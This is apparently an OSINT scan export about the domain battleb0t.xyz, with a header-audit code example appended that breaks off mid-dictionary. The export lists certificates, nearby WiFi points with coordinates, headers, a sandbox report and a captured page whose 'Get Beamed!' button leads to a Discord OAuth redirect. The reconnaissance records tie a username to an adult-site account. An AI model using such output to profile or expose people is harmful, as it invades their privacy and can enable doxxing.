u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | The Batcave (Net ID: 00:11:32:7C:A3:88) | 50.8897, 6.0563 |
| 2023-05-12 03:19:17 | Web Framework | No | Web Framework Identifier | 0 | 0 | 3 | 0 | None | Bootstrap | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.6.166 |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | akashpmani.github.io | 185.199.110.153 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | xHamster (Category: XXXPORNXXX)<br>https://xhamster.com/users/ayshoo | ayshoo |
| 2023-05-12 02:47:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 13, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://riverside.fm/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"edge.fullstory.com"\n "ekr.zdassets.com"\n "js.hs-banner.com"\n "riverside.fm"\n "riversidefm.zendesk.com"\n "rs.fullstory.com"\n "static.zdassets.com"\n "track.hubspot.com"\n "www.comeet.co"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"riverside.fm"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6828:120:WilError_01"\n "Local\\SM0:4116:120:WilError_01"\n "Local\\SM0:4116:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:6828:304:WilStaging_02"\n "Local\\SM0:6828:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6828:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3800:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.134.250:80"\n "172.67.134.250:443"\n "142.251.32.42:443"\n "142.250.191.35:443"\n "99.84.238.172:443"\n "142.251.46.170:443"\n "185.199.111.153:443"\n "172.64.133.15:443"\n "104.18.7.3:443"\n "143.204.130.227:443"\n "142.250.189.206:443"\n "142.251.214.142:443"\n "104.18.70.113:443"\n "99.84.238.190:443"\n "157.240.22.25:443"\n "45.60.121.129:443"\n "99.84.238.103:443"\n "52.216.212.177:443"\n "142.250.189.232:443"\n "13.35.126.71:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Platform Notifications\\000003.log]- [targetUID: 00000000-00006828]\n "f_00024d" has type "Web Open Font Format (Version 2) TrueType length 37716 version 1.0"- [targetUID: N/A]\n "f_000268" has type "ISO Media MP4 v2 [ISO 14496-14]"- [targetUID: N/A]\n "4b022efb3c5a14dc_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\4b022efb3c5a14dc_0]- [targetUID: 00000000-00006828]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006828]\n "f_00023e" has type "PNG image data 338 x 732 8-bit colormap non-interlaced"- [targetUID: 
N/A]\n "f540820f-9f89-412f-923b-51d1f67340a2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "ed03a5b80f066844_0" has type "data"- [targetUID: N/A]\n "14bf4ad036e1a574_0" has type "data"- [targetUID: N/A]\n "f_000243" has type "PNG image data 1200 x 1200 8-bit colormap non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00002580]\n "97a3780cf75de2bb_0" has type "data"- [targetUID: N/A]\n "f_00023d" has type "PNG image data 800 x 450 8-bit colormap non-interlaced"- [targetUID: N/A]\n "6f7515d7-b36c-4d00-b122-1a7c8010b099.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\6f7515d7-b36c-4d00-b122-1a7c8010b099.tmp]- [targetUID: 00000000-00006828]\n "83e8ee8deb6b8139_0" has type "data"- [targetUID: N/A]\n "f_00026e" has type "data"- [targetUID: N/A]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "934c5a20edee0f55_0" has type "data"- [targetUID: N/A]\n "12a6f2f66e30a04a_0" has type "data"- [targetUID: N/A]\n "f_000274" has type "data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"rs.fullstory.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://riverside.fm/"\n Pattern 
match: "http://riverside.fm"\n Heuristic match: "riverside.fm"\n Heuristic match: "edge.fullstory.com"\n Heuristic match: "ekr.zdassets.com"\n Heuristic match: "js.hs-banner.com"\n Heuristic match: "riversidefm.zendesk.com"\n Heuristic match: "rs.fullstory.com"\n Heuristic match: "static.zdassets.com"\n Heuristic match: "track.hubspot.com"\n Pattern match: "www.comeet.co"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63dcded18cdba55a3f42cb19', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', 
u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'172.67.134.250', u'172.67.134.250', u'142.251.32.42', u'142.250.191.35', u'99.84.238.172', u'142.251.46.170', u'185.199.111.153', u'172.64.133.15', u'104.18.7.3', u'143.204.130.227', u'142.250.189.206', u'142.251.214.142', u'104.18.70.113', u'99.84.238.190', u'157.240.22.25', u'45.60.121.129', u'99.84.238.103', u'52.216.212.177', u'142.250.189.232', u'13.35.126.71', u'142.250.189.214', u'142.250.191.34', u'23.55.103.97', u'13.35.125.16', u'104.17.210.204', u'13.35.125.14', u'157.240.22.35', u'142.251.46.238', u'142.251.214.134', u'13.35.125.69', u'104.17.71.176', u'104.18.33.171', u'44.227.167.233', u'142.251.2.154', u'142.250.188.10', u'142.250.189.161', u'104.16.53.111', u'52.42.126.136', u'35.201.112.186', u'99.84.238.112', u'35.186.194.58', u'151.101.2.110', u'54.213.154.214', u'52.89.127.0', u'35.162.236.93', u'142.250.189.174', u'142.251.46.195', u'142.251.32.46', u'104.19.154.83', u'35.244.218.227'], u'sha256': u'2dd0c093bda9d915f5043f2e827c446b6911c760e46c3e11de607a05c686856b', u'sha512': u'72c6b21776ab594c097dba2585e7c5cabfe3f0a116e6a60e56e8e82be3938b5106a767d0610253d53ed8c500378e47de2de124b42a77a51f8ffcbd03097caa4b', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://riverside.fm/', u'submission_id': u'63dcded18cdba55a3f42cb1a', u'created_at': u'2023-02-03T10:15:45+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-03T10:15:45+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 50, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'c56dad5fd0c2962e78335f65f428f5b5', u'network_mode': u'default', 
u'processes': [], u'sha1': u'77f939fc618403372967a345ca4999fdf36e90a4', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 10 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'edge.fullstory.com', u'ekr.zdassets.com', u'js.hs-banner.com' | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Curiouscat (Category: social)<br>https://curiouscat.live/login | login |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom474ABC (Net ID: 00:0C:F6:47:4A:BC) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative innovation network - Collaborative innovation is a process in which multiple players contribute towards creating new products with customers and suppliers. | battleb0t.github.io |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:03:66:4F) | 52.3759, 4.8975 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SHE (Net ID: 00:02:6F:3B:09:D3) | 37.7642, -122.3993 |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden<br>Date: <REDACTED><br>Content-Type: text/html; charset=UTF-8<br>Transfer-Encoding: chunked<br>Connection: close<br>X-Frame-Options: SAMEORIGIN<br>Referrer-Policy: same-origin<br>Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br>Expires: Thu, 01 Jan 1970 00:00:01 GMT<br>Vary: Accept-Encoding<br>Server: cloudflare<br>CF-RAY: 7c5de9314c41108c-ORD<br>Content-Encoding: gzip | 104.21.71.14 |
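The three HTTP rows above (the Strange Header Identifier rows carrying full header sets, and the Censys 403 banner) record response headers as captured, without grading them. The following is an added example, not part of the scan export or of any scanner module: it audits a captured header dict against a small baseline, parses `Permissions-Policy` into a feature map, and treats a response carrying `cf-mitigated: challenge` as a Cloudflare interstitial whose headers say nothing about the origin application. The two sample header dicts are trimmed copies of the captured responses; the baseline list and the severity wording are this example's own choices.

```python
"""Audit captured HTTP response headers from a scan export (added example)."""
import json

# Constructed from the captured responses on this page (trimmed to the
# headers that matter for the audit).
CHALLENGE_RESPONSE = {
    "server": "cloudflare",
    "cf-mitigated": "challenge",
    "content-type": "text/html; charset=UTF-8",
    "x-frame-options": "SAMEORIGIN",
    "referrer-policy": "same-origin",
    "permissions-policy": "accelerometer=(),camera=(),geolocation=(),microphone=(),payment=(),usb=()",
    "cross-origin-opener-policy": "same-origin",
    "cross-origin-embedder-policy": "require-corp",
    "cross-origin-resource-policy": "same-origin",
}
JS_ASSET_RESPONSE = {
    "server": "cloudflare",
    "content-type": "application/javascript",
    "x-content-type-options": "nosniff",
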